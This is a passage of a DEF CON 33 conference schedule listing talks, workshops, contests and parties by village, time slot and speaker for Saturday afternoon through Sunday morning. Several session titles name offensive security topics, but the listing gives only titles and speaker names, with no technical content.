HRV - cont...(11:00-16:59 PDT) - Free Ham Radio Exams -
ICSV - OT Network Segmentation Planning, Implementation, and Validation - Tony Turner
IOTV - cont...(13:45-14:15 PDT) - The Things know What You Did Last Session - Will Baggett
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Fotis Chantizis/ No Starch Press - Fotis Chantizis
MISC - Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC - Chris DeCarmen
MISC - Book Signing - Paulino Calderon/No Starch Press - Paulino Calderon
MISC - Book Signing - The Hacker Mindset: A 5-Step Methodology for Cracking the System and Achieving Your Dreams - Garrett Gee/Hacker Warehouse - Garrett Gee
MISC - DC Book Club Discussion -
MWV - cont...(13:40-14:15 PDT) - Enshittification: It's Over 9000 - Lena "LambdaMamba" Yu,Andrew Brandt,Samuel Gasparro,Daniel Ward
MWV - Mac Malware Analysis - Patrick Wardle
MWV - (14:30-14:59 PDT) - The Cookie Heist: How Cybercriminals Are Outsmarting Chrome's Latest Defenses - Mrigakshi Goel
PAYV - Voices of the Industry: A Fireside Chat with Payment Leaders - Leigh-Anne Galloway,Giustina Kent,Daniel Cuthbert
PGE - Sticker Swap at DEF CON 33 -
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - cont...(11:00-16:50 PDT) - BloodHound Enterprise CTF - Hugo van den Toorn,Joey Dreijer
RTV - cont...(11:00-14:50 PDT) - Hacker Troll House - James Rice
RTV - cont...(11:00-16:50 PDT) - DNS-Based OSINT Tactics for Product and Service Discovery - Rishi "rxerium" Chudasama
RTV - cont...(11:00-16:50 PDT) - Ransomware vs EDR: Inside the Attacker's Mind - Zoziel Freire
RTV - cont...(13:00-14:50 PDT) - Introduction to Operationalizing & Using C2 (w/ some AI) - Gabi Joseph,Josh Millsap
RTV - cont...(13:00-14:50 PDT) - StealthToken: Exploiting Identity Providers the Serverless Way - Manish Gupta,Yash Bharadwaj
RTV - cont...(13:00-14:50 PDT) - Building Your First Windows Malware Loader - Royce Yaezenko
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(12:30-15:30 PDT) - Battle of the Bots: Vishing Edition -
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -

 

Saturday - 15:00 PDT


Return to Index  -  Locations Legend
- Hard Hat Brigade Organizer Panel - MrBill,M0nkeyDrag0n,Hydrox,CoD_Segfault
ADV - (15:30-15:59 PDT) - Operational Twilight: APTs, OT, and the geopolitics of a dying climate - Cybelle Oliveira
ADV - Countering Forensics Software by Baiting Them - Weihan Goh,Joseph Lim,Isaac Soon
BBV - Referral Beware, Your Rewards Are Mine - Whit "un1tycyb3r" Taylor
BBV - Platform Panel about Triage - Michelle Lopez,Michael "codingo_" Skelton,Inti "intidc" De Ceukelaire,Eddie Rios,Anthony Silva,Jasmin "JR0ch17" Landry
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
BHV - Digital First Responders: Fixing Patient Safety Gaps with Smart Tech & AI - Jennifer Schieferle Uhlenbrock
CON - cont...(10:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - cont...(14:00-15:50 PDT) - Oblivious Access to Blockchains - Elaine Shi,Afonso Tinoco
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - Browser Extension Clickjacking: One Click and Your Credit Card Is Stolen - Marek Tóth
DCT - Shaking Out Shells with SSHamble - HD Moore
DCT - (15:30-16:15 PDT) - Metal-as-a-Disservice: Exploiting Legacy Flaws in Cutting-Edge Clouds - Bill Demirkapi
DCT - cont...(14:30-15:15 PDT) - ReVault! Compromised by your Secure SoC - Philippe "phLaul" Laulheret
DCT - (15:30-16:15 PDT) - Zero Trust, Total Bust - Breaking into thousands of cloud-based VPNs with one bug - David "johnnyspandex" Cash,Rich "Buffaloverflow" Warren
DCT - cont...(14:30-16:15 PDT) - Ask EFF - Hannah Zhao,Alexis Hancock,Cooper "CyberTiger" Quintin,Lisa Femia,Thorin Klosowski
DCT - Ghosts of REvil: An Inside Look with the Hacker Behind the Kaseya Ransomware Attack - Jon DiMaggio,John Fokker
DCW - cont...(14:00-17:59 PDT) - Learning to Hack Bluetooth Low Energy with BLE CTF - Ryan Holeman,Alek Amrani
DCW - cont...(14:00-17:59 PDT) - Putting EDRs in Their Place: Killing and Silencing EDR Agents - Ryan "rj_chap" Chapman,Aaron "ironcat" Rosenmund
DCW - cont...(14:00-17:59 PDT) - From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications - Ashwin Iyer,Ritika Verma
DCW - cont...(14:00-17:59 PDT) - K8sploitation: Hacking Kubernetes the Fun Way - Marcelo Ribeiro,Jeff Jordan
DCW - cont...(14:00-17:59 PDT) - Hacking The Metal: Into the GPU - eigentourist
DCW - cont...(14:00-17:59 PDT) - Hacker VPN - Eijah,Benjamin "Cave Twink" Woodill
DCW - cont...(14:00-17:59 PDT) - Defeating Malware Evasion: Techniques and Countermeasures - Kyle "d4rksystem" Cucci,Randy Pargman
DCW - cont...(14:00-17:59 PDT) - Deep-dive into modern network fingerprinting - Vlad Iliushin
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DDV - MFT2: More Fungible Threats - Mauro Eldritch,Nelson Colón
DL - Dyna - Automating the OWASP MASTG with Offensive Android Tactics - Arjun "T3R4_KAAL" Chaudhary,Ayodele Ibidapo
DL - Metasploit's Latest Attack Capability and Workflow Improvements - Spencer "ZeroSteiner" McIntyre,Jack Heysel
DL - rev.ng Decompiler - Pietro Fezzardi,Alessandro Di Federico
DL - Garuda Threat Hunting Framework - Monnappa "Monnappa22" K A,Sajan Shetty
DL - RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus - Cesare "Red5heep" Pizzi
HRV - cont...(11:00-16:59 PDT) - Free Ham Radio Exams -
ICSV - There and Back Again: Discovering OT devices across protocol gateways - Rob King
MHV - Pirates of the North Sea - John Andre Bjørkhaug
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Jason Andress/ No Starch Press - Jason Andress
MISC - Book Signing - Kara Nance/No Starch Press - Kara Nance
MISC - Book Signing - The Browser Security Field Manual Adeline - Audrey Adeline - Audrey Adeline
MISC - cont...(14:00-15:59 PDT) - DC Book Club Discussion -
MWV - cont...(14:00-17:59 PDT) - Mac Malware Analysis - Patrick Wardle
MWV - Unveiling the shadows: Digital Forensics evidence in AI-Driven CyberCrime - Neumann "scsideath" Lim,Jugal Patel,Stephanie Corvese,Debasis Parida
MWV - (15:50-16:20 PDT) - Deconstructing Malware Lineage with Graph Neural Networks - David Rushmer
PAYV - Beyond the Stack: How External Failures Impact Payments Security - Tapan Khilnani
PGE - cont...(14:00-15:59 PDT) - Sticker Swap at DEF CON 33 -
RTV - Cyber Wargames: Redteam Rumble -
RTV - cont...(11:00-16:50 PDT) - BloodHound Enterprise CTF - Hugo van den Toorn,Joey Dreijer
RTV - Mythic, Ghostwriter, Nemesis, and Tying the Room Together: The Dude's Guide to Red Team Operations - Michael Donley
RTV - cont...(11:00-16:50 PDT) - DNS-Based OSINT Tactics for Product and Service Discovery - Rishi "rxerium" Chudasama
RTV - cont...(11:00-16:50 PDT) - Ransomware vs EDR: Inside the Attacker's Mind - Zoziel Freire
RTV - From Prey to Playbook: Learning about victim behavior from infostealer logs - Megan Squire
RTV - Redteam Infrastructure Vibez Edition - Moses Frost
RTV - Go Hack Yourself: API Hacking for Beginners - Katie "InsiderPhD" Paxton-Fear
RTV - Level UP OSINT - Mishaal Khan
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(12:30-15:30 PDT) - Battle of the Bots: Vishing Edition -
SEV - (15:30-17:59 PDT) - Cold Calls -
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -

 

Saturday - 16:00 PDT


Return to Index  -  Locations Legend
AIV - (16:30-17:15 PDT) - Impact of Frontier AI on the Landscape of Cybersecurity - Dawn Song
BBV - cont...(15:00-16:30 PDT) - Platform Panel about Triage - Michelle Lopez,Michael "codingo_" Skelton,Inti "intidc" De Ceukelaire,Eddie Rios,Anthony Silva,Jasmin "JR0ch17" Landry
BBV - (16:30-17:30 PDT) - Hacking the Graph: Advanced Target Discovery with OWASP Amass - Jeff "caffix" Foley
CON - Hack3r Runw@y Contest -
CON - cont...(10:00-16:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - Cryptocurrency Nodes and Relays - Diego "rehrar" Salazar,Dan
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - Turning Microsoft's Login Page into our Phishing Infrastructure - Keanu "RedByte" Nys
DCT - cont...(15:30-16:15 PDT) - Metal-as-a-Disservice: Exploiting Legacy Flaws in Cutting-Edge Clouds - Bill Demirkapi
DCT - (16:30-17:15 PDT) - Direct Memory, Access Everywhere - Joe "securelyfitz" FitzPatrick,Grace "Baelfire" Parrish
DCT - cont...(15:30-16:15 PDT) - Zero Trust, Total Bust - Breaking into thousands of cloud-based VPNs with one bug - David "johnnyspandex" Cash,Rich "Buffaloverflow" Warren
DCT - (16:30-17:15 PDT) - De-Virtualizing the Dragon: Automated Unpacking and Deobfuscation of Nested VM-Based Protectors using Symbolic Execution and Taint Tracking - Agostino "Van1sh" Panico
DCT - cont...(14:30-16:15 PDT) - Ask EFF - Hannah Zhao,Alexis Hancock,Cooper "CyberTiger" Quintin,Lisa Femia,Thorin Klosowski
DCT - (16:30-17:15 PDT) - 7 Vulns in 7 Days: Breaking Bloatware Faster Than It’s Built - Leon "leonjza" Jacobs
DCT - "We are currently clean on OPSEC": The Signalgate Saga - Micah "micahflee" Lee
DCW - cont...(14:00-17:59 PDT) - Learning to Hack Bluetooth Low Energy with BLE CTF - Ryan Holeman,Alek Amrani
DCW - cont...(14:00-17:59 PDT) - Putting EDRs in Their Place: Killing and Silencing EDR Agents - Ryan "rj_chap" Chapman,Aaron "ironcat" Rosenmund
DCW - cont...(14:00-17:59 PDT) - From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications - Ashwin Iyer,Ritika Verma
DCW - cont...(14:00-17:59 PDT) - K8sploitation: Hacking Kubernetes the Fun Way - Marcelo Ribeiro,Jeff Jordan
DCW - cont...(14:00-17:59 PDT) - Hacking The Metal: Into the GPU - eigentourist
DCW - cont...(14:00-17:59 PDT) - Hacker VPN - Eijah,Benjamin "Cave Twink" Woodill
DCW - cont...(14:00-17:59 PDT) - Defeating Malware Evasion: Techniques and Countermeasures - Kyle "d4rksystem" Cucci,Randy Pargman
DCW - cont...(14:00-17:59 PDT) - Deep-dive into modern network fingerprinting - Vlad Iliushin
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - Tengu Marauder v2 - Lexie "L3xic0n" Thach,Munir Muhammad
DL - Metasploit's Latest Attack Capability and Workflow Improvements - Spencer "ZeroSteiner" McIntyre,Jack Heysel
DL - C4 - Cross Compatible Command and Control - Scott "ScottCTaylor12" Taylor
DL - Garuda Threat Hunting Framework - Monnappa "Monnappa22" K A,Sajan Shetty
DL - Spotter - Universal Kubernetes Security Scanner and Policy Enforcer - Madhu "madhuakula" Akula
HRV - cont...(11:00-16:59 PDT) - Free Ham Radio Exams -
MHV - (16:30-16:59 PDT) - Resilient and Reconfigurable Maritime Comms. - AviNash Srinivasan
MHV - (16:30-16:59 PDT) - How Computers Kill People: Marine Systems - Michael DeVolld,Austin Reid
MHV - Dead Reckoning: Hijacking Marine Autopilots - Carson Green,Rik Chatterjee
MHV - Fingerprinting Maritime NMEA2000 Networks - Constantine Macris (TheDini),Anissa Elias
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MISC - Book Signing - Breaking IN: A Practical Guide To Starting a Career In Information Security Cybersecurity Essentials For Startups : A Practical Guide - Ayman Elsawah - Ayman Elsawah
MWV - cont...(14:00-17:59 PDT) - Mac Malware Analysis - Patrick Wardle
MWV - cont...(15:50-16:20 PDT) - Deconstructing Malware Lineage with Graph Neural Networks - David Rushmer
MWV - Exposing Infosec Frauds and Foreign Agents Behind Mercenary Spyware Disinformation - Cthulhu
PAYV - (16:30-17:30 PDT) - Brazil's aPIXcalypse - How real time payments turned Brazilian threat scenario into a nightmare - Anchises Moraes
PGE - Queercon Mixer -
PHV - SSH Honeypots and Walkthrough Workshops: A History - Ryan Mitchell
PLV - China's Health Sector Ambitions and Information Needs: Implications for U.S. Health Care Cyber Defense - Amelia Shapiro
PSV - Your Passkey is Weak: Phishing the Unphishable - Chad Spensky
QTV - (16:30-17:15 PDT) - Post-Quantum Panic: When Will the Cracking Begin, and Can We Detect it? - Konstantinos Karagiannis
RTV - cont...(15:00-16:59 PDT) - Cyber Wargames: Redteam Rumble -
RTV - cont...(11:00-16:50 PDT) - BloodHound Enterprise CTF - Hugo van den Toorn,Joey Dreijer
RTV - cont...(15:00-16:50 PDT) - Mythic, Ghostwriter, Nemesis, and Tying the Room Together: The Dude's Guide to Red Team Operations - Michael Donley
RTV - cont...(11:00-16:50 PDT) - DNS-Based OSINT Tactics for Product and Service Discovery - Rishi "rxerium" Chudasama
RTV - cont...(11:00-16:50 PDT) - Ransomware vs EDR: Inside the Attacker's Mind - Zoziel Freire
RTV - Don the Mantle: Red Team Campaign Planning and Execution with MITRE ATT&CK - William Giles
RTV - cont...(15:00-16:50 PDT) - Redteam Infrastructure Vibez Edition - Moses Frost
RTV - cont...(15:00-16:50 PDT) - Go Hack Yourself: API Hacking for Beginners - Katie "InsiderPhD" Paxton-Fear
RTV - Tales from the NIST AI Pen Test Challenge - AI Pen Testing 101 - Lee McWhorter
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(15:30-17:59 PDT) - Cold Calls -
TRN - cont...(08:00-16:59 PDT) - Medical Device Penetration Testing -
TRN - cont...(08:00-16:59 PDT) - Beginner's Guide to Attacks and Defenses - Sam Bowne,Kaitlyn Handelman,Irvin Lemus,Elizabeth Biddlecome
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Saturday - 17:00 PDT


Return to Index  -  Locations Legend
AIV - cont...(16:30-17:15 PDT) - Impact of Frontier AI on the Landscape of Cybersecurity - Dawn Song
BBV - cont...(16:30-17:30 PDT) - Hacking the Graph: Advanced Target Discovery with OWASP Amass - Jeff "caffix" Foley
BBV - (17:30-17:59 PDT) - Cheat Code for Hacking on T-Mobile: From Inside the TMO BBP Perspective - Elisa Gangemi
CHV - One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication - Marcell Szakály,Sebastian Köhler,Jan "SP3ZN45" Berens
CON - cont...(16:00-17:59 PDT) - Hack3r Runw@y Contest -
CON - cont...(10:30-17:30 PDT) - Kubernetes Competitive CTF -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - cont...(16:00-17:50 PDT) - Cryptocurrency Nodes and Relays - Diego "rehrar" Salazar,Dan
CRE - cont...(10:00-17:59 PDT) - Career Fair: Resume Review - Ruchira Pokhriyal,Harini Ramprasad
CRE - Breaking In: Real Paths Into Cybersecurity from Hackers, Humans, and Hiring Pros - Eva Benn,Rosie "Lady Cyber Rosie" Anderson,Tib3rius
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - Blind Trailer Shouting - Ben Gardiner
DCT - cont...(16:30-17:15 PDT) - Direct Memory, Access Everywhere - Joe "securelyfitz" FitzPatrick,Grace "Baelfire" Parrish
DCT - (17:30-17:50 PDT) - Hacking Hotspots: Pre-Auth Remote Code Execution, Arbitrary SMS & Adjacent Attacks on 5G and 4G/LTE Routers - Edward "Actuator" Warren
DCT - cont...(16:30-17:15 PDT) - De-Virtualizing the Dragon: Automated Unpacking and Deobfuscation of Nested VM-Based Protectors using Symbolic Execution and Taint Tracking - Agostino "Van1sh" Panico
DCT - (17:30-17:50 PDT) - Voice Cloning Air Traffic Control: Vulnerabilities at Runway Crossings - Andrew "Helicopters of DC" Logan
DCT - cont...(16:30-17:15 PDT) - 7 Vulns in 7 Days: Breaking Bloatware Faster Than It’s Built - Leon "leonjza" Jacobs
DCT - (17:30-17:50 PDT) - OverLAPS: Overriding LAPS Logic - Antoine Goichot
DCT - Amber64: Mining Hacker History from Over Half a Million Commodore 64 Disks - Wesley McGrew
DCW - cont...(14:00-17:59 PDT) - Learning to Hack Bluetooth Low Energy with BLE CTF - Ryan Holeman,Alek Amrani
DCW - cont...(14:00-17:59 PDT) - Putting EDRs in Their Place: Killing and Silencing EDR Agents - Ryan "rj_chap" Chapman,Aaron "ironcat" Rosenmund
DCW - cont...(14:00-17:59 PDT) - From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications - Ashwin Iyer,Ritika Verma
DCW - cont...(14:00-17:59 PDT) - K8sploitation: Hacking Kubernetes the Fun Way - Marcelo Ribeiro,Jeff Jordan
DCW - cont...(14:00-17:59 PDT) - Hacking The Metal: Into the GPU - eigentourist
DCW - cont...(14:00-17:59 PDT) - Hacker VPN - Eijah,Benjamin "Cave Twink" Woodill
DCW - cont...(14:00-17:59 PDT) - Defeating Malware Evasion: Techniques and Countermeasures - Kyle "d4rksystem" Cucci,Randy Pargman
DCW - cont...(14:00-17:59 PDT) - Deep-dive into modern network fingerprinting - Vlad Iliushin
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MWV - cont...(14:00-17:59 PDT) - Mac Malware Analysis - Patrick Wardle
MWV - The Quantum Shift: Practical Post-Quantum Risk: Algorithms, Infrastructure, and Transition - Sean Prescott,Ted Carefoot
MWV - (17:50-18:20 PDT) - NO-HAVOC today, NO-HAVOC tomorrow - Lena "LambdaMamba" Yu,Samuel Gasparro,Daniel Ward
PAYV - cont...(16:30-17:30 PDT) - Brazil's aPIXcalypse - How real time payments turned Brazilian threat scenario into a nightmare - Anchises Moraes
PGE - Friends of Bill W -
PGE - cont...(16:00-17:59 PDT) - Queercon Mixer -
PHV - Hacking Context for Auto Root Cause and Attack Flow Discovery - Ezz Tahoun
QTV - cont...(16:30-17:15 PDT) - Post-Quantum Panic: When Will the Cracking Begin, and Can We Detect it? - Konstantinos Karagiannis
SEV - cont...(10:00-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(15:30-17:59 PDT) - Cold Calls -

 

Saturday - 18:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(09:00-18:59 PDT) - Human Registration Open -
MWV - cont...(17:50-18:20 PDT) - NO-HAVOC today, NO-HAVOC tomorrow - Lena "LambdaMamba" Yu,Samuel Gasparro,Daniel Ward

 

Saturday - 19:00 PDT


Return to Index  -  Locations Legend
CON - EFF Tech Trivia -
MISC - Hacker Karaoke -
PGE - (19:30-22:59 PDT) - DC NextGen -
PGE - (19:30-22:30 PDT) - The DEF CON Pool Party -

 

Saturday - 20:00 PDT


Return to Index  -  Locations Legend
CON - cont...(19:00-21:59 PDT) - EFF Tech Trivia -
CON - Hacker Jeopardy -
PGE - The Jasmine Dragon -
PGE - cont...(19:30-22:59 PDT) - DC NextGen -
PGE - cont...(19:30-22:30 PDT) - The DEF CON Pool Party -

 

Saturday - 21:00 PDT


Return to Index  -  Locations Legend
CON - cont...(19:00-21:59 PDT) - EFF Tech Trivia -
CON - cont...(20:00-21:59 PDT) - Hacker Jeopardy -
PGE - cont...(20:00-23:59 PDT) - The Jasmine Dragon -
PGE - Cyberdelia Rave -
PGE - Day of the Dead Hacker Party -
PGE - cont...(19:30-22:59 PDT) - DC NextGen -
PGE - GOTHCON -
PGE - The Illuminati Party -
PGE - VETCON 2025 Party -
PGE - cont...(19:30-22:30 PDT) - The DEF CON Pool Party -

 

Saturday - 22:00 PDT


Return to Index  -  Locations Legend
CON - (22:30-00:30 PDT) - Feet Feud (Hacker Family Feud) -
PGE - cont...(20:00-23:59 PDT) - The Jasmine Dragon -
PGE - Call Center Village Party -
PGE - cont...(19:30-22:59 PDT) - DC NextGen -
PGE - cont...(19:30-22:30 PDT) - The DEF CON Pool Party -

 

Saturday - 23:00 PDT


Return to Index  -  Locations Legend
PGE - cont...(20:00-23:59 PDT) - The Jasmine Dragon -

Sunday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Sunday - 06:00 PDT


Return to Index  -  Locations Legend
MISC - Defcon.run -

 

Sunday - 07:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(06:00-07:59 PDT) - Defcon.run -

 

Sunday - 08:00 PDT


Return to Index  -  Locations Legend
TRN - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 09:00 PDT


Return to Index  -  Locations Legend
DCW - DIY Malware Emulation: Build It, Break It, Detect It - Sebastian Tapia,Ricardo Sanchez
DCW - Provably exfiltrating data by breaking TLS in the right ways - AtHeartEngineer,Sinu
DCW - Hacking the connected plant: AI edition! - Arnaud Soullié,Alexandrine TORRENTS
DCW - Creating malicious functional app on Android - HackeMate
DCW - Cloud Forensics Workshop: Smart Grid Edition - Kerry "Professor Kilroy" Hazelton
DCW - Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level - Preston Zen
DCW - Hands-on IoT firmware extraction and flash forensics - Dennis Giese,Braelynn Luedtke
DCW - EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA. - Patrick "Gigstorm" Kiley
MISC - Human Registration Open -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 10:00 PDT


Return to Index  -  Locations Legend
- Sticker Swap -
ASV - Behind the Badge: How We Used and Abused Hardware (again) to Create the AV Badge for DC33 - Adam Batori,Robert Pafford
BBV - Bug Bounty Village Social Hour -
CHV - Blind Trailer Shouting - Ben Gardiner
CON - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - Hac-Mac Contest Booth Open -
CPV - Crypto Privacy Village: Welcome - Crypto Privacy Village Staff
CPV - (10:30-10:45 PDT) - Intro to Ciphers [Mini Workshop/Talk] - Crypto Privacy Village Staff
CPV - Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks - Eugene "spaceraccoon" Lim
CRE - Let's Break Enigma! - Rigo Salazar,Luke Szramowski
CRE - Memorial Chamber Open -
DCT - Invitation Is All You Need! Invoking Gemini for Workspace Agents with a Simple Google Calendar Invite - Ben Nassi,Or "oryair1999" Yair,Stav Cohen
DCT - SSH-nanigans: Busting Open the Mainframes Iron Fortress through Unix - Philip "Soldier of FORTRAN" Young
DCT - From Shanghai to the Shore: The Silent Threat in Global Shipping - Kenneth Miltenberger,Nicholas Fredericksen
DCT - (10:30-11:15 PDT) - Can't Stop the ROP: Automating Universal ASLR Bypasses for Windows - Bramwell Brizendine
DCT - Mind the Data Voids: Hijacking Copilot Trust to Deliver C2 Instructions with Microsoft Authority - Tobias "ItsSixtyNein" Diehl
DCT - (10:30-11:15 PDT) - Jailbreaking the Hivemind: Finding and Exploiting Kernel Vulnerabilities in the eBPF Subsystem - Agostino "Van1sh" Panico
DCT - Cyber Volunteering and Community Defense - DEF CON Franklin and the Cyber Resilience Corps 1 Year In - Sarah Powazek,Jake Braun,Adrien Ogee
DCW - cont...(09:00-12:59 PDT) - DIY Malware Emulation: Build It, Break It, Detect It - Sebastian Tapia,Ricardo Sanchez
DCW - cont...(09:00-12:59 PDT) - Provably exfiltrating data by breaking TLS in the right ways - AtHeartEngineer,Sinu
DCW - cont...(09:00-12:59 PDT) - Hacking the connected plant: AI edition! - Arnaud Soullié,Alexandrine TORRENTS
DCW - cont...(09:00-12:59 PDT) - Creating malicious functional app on Android - HackeMate
DCW - cont...(09:00-12:59 PDT) - Cloud Forensics Workshop: Smart Grid Edition - Kerry "Professor Kilroy" Hazelton
DCW - cont...(09:00-12:59 PDT) - Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level - Preston Zen
DCW - cont...(09:00-12:59 PDT) - Hands-on IoT firmware extraction and flash forensics - Dennis Giese,Braelynn Luedtke
DCW - cont...(09:00-12:59 PDT) - EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA. - Patrick "Gigstorm" Kiley
DDV - Last chance to pick up drives at the DDV -
ICSV - (10:30-10:59 PDT) - Don’t Cry Wolf: Evidence-based assessments of ICS Threats - Jimmy Wylie,Sam Hanson
MISC - cont...(09:00-11:59 PDT) - Human Registration Open -
MISC - Lost & Found -
MISC - Book Signing - Ghost Hacker : How to hack human spirit - Jun Kawasaki - Jun “Ghost Hacker” Kawasaki
PSV - Intro to Physical Security Bypass - Karen Ng,Matthew Cancilla
PSV - Elevators 101 - Bobby Graydon,Ege Feyzioglu
RTV - Attacking Kubernetes: Tools and Tactics to Compromise Your First Cluster - Lenin Alevski
RTV - OSINT Challenges - Alex Ackerman,Lee McWhorter,Sandra Stibbards
RTV - Ask a Hiring Manager with Troy Fridley - Troy Fridley
RTV - Ask a Hiring Manager with Cory Wolff - Cory Wolff
RTV - Ask a Hiring Manager with Peter Hefley - Peter Hefley
SEV - Social Engineering Community Village - Village Open -
SEV - Social Engineering Community Village - Contest Awards -
SEV - (10:45-11:30 PDT) - Cold Calls -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 11:00 PDT


Return to Index  -  Locations Legend
- cont...(10:00-12:59 PDT) - Sticker Swap -
ADV - Red Russians: How Russian APT groups closely follow offensive security research - Will Thomas
ADV - Here and Now: Exploiting the Human Layer at the Right Moment - Daniel Isler
ASV - Hacking Space to Defend It: Generating IoBs with SPARTA - Brandon Bailey
BBV - Hacker vs. Triage: Inside the Bug Bounty Battleground - Richard "richeeta" Hyunho Im,Denis Smajlović
BBV - Hacking at Scale with AI Agents: Building an Autonomous Bug Bounty Hunter - Vanshal Gaur
BBV - Full Disclosure, Full Color: Badge-making story of this year's BBV badge - Abhinav Pandagale
BBV - (11:30-11:59 PDT) - Portswigger Awards: Top 10 web hacking techniques of 2024 - Portswigger
BHV - (11:30-11:59 PDT) - Bare Metal Reverse Engineering - SolaSec
BHV - (11:30-11:59 PDT) - ​​Introducing CIPHER: The Open-Source Platform Revealing Patient Harms from Healthcare Cyberattacks - Isabel Straw
CON - cont...(10:00-11:59 PDT) - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:00-12:59 PDT) - Hac-Mac Contest Booth Open -
CPV - You Can Mix but You Can’t Hide: Uncovering Node Behaviors in Nym Network - Alexis Cao
CRE - cont...(10:00-11:50 PDT) - Let's Break Enigma! - Rigo Salazar,Luke Szramowski
CRE - Creating Integrated Threat Surveillance: AI + OSINT + Security Onion - Desiree Wilson
CRE - cont...(10:00-13:59 PDT) - Memorial Chamber Open -
DCT - Playing Dirty Without Cheating - Getting Banned for Fun and No Profit - Sam Collins,Marius Muench,Tom Chothia
DCT - Journey to the center of the PSTN: How I became a phone company, and why you should too. - Enzo Damato
DCT - cont...(10:30-11:15 PDT) - Can't Stop the ROP: Automating Universal ASLR Bypasses for Windows - Bramwell Brizendine
DCT - (11:30-12:15 PDT) - Passkeys Pwned: Turning WebAuthn Against Itself - Shourya Pratap Singh,Jonny Lin,Daniel Seetoh
DCT - cont...(10:30-11:15 PDT) - Jailbreaking the Hivemind: Finding and Exploiting Kernel Vulnerabilities in the eBPF Subsystem - Agostino "Van1sh" Panico
DCT - (11:30-12:15 PDT) - Breaking Wi-Fi Easy Connect: A Security Analysis of DPP - George "sophron" Chatzisofroniou
DCT - Kill List: Hacking an Assassination Site on the Dark Web - Carl Miller,Chris Monteiro
DCW - cont...(09:00-12:59 PDT) - DIY Malware Emulation: Build It, Break It, Detect It - Sebastian Tapia,Ricardo Sanchez
DCW - cont...(09:00-12:59 PDT) - Provably exfiltrating data by breaking TLS in the right ways - AtHeartEngineer,Sinu
DCW - cont...(09:00-12:59 PDT) - Hacking the connected plant: AI edition! - Arnaud Soullié,Alexandrine TORRENTS
DCW - cont...(09:00-12:59 PDT) - Creating malicious functional app on Android - HackeMate
DCW - cont...(09:00-12:59 PDT) - Cloud Forensics Workshop: Smart Grid Edition - Kerry "Professor Kilroy" Hazelton
DCW - cont...(09:00-12:59 PDT) - Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level - Preston Zen
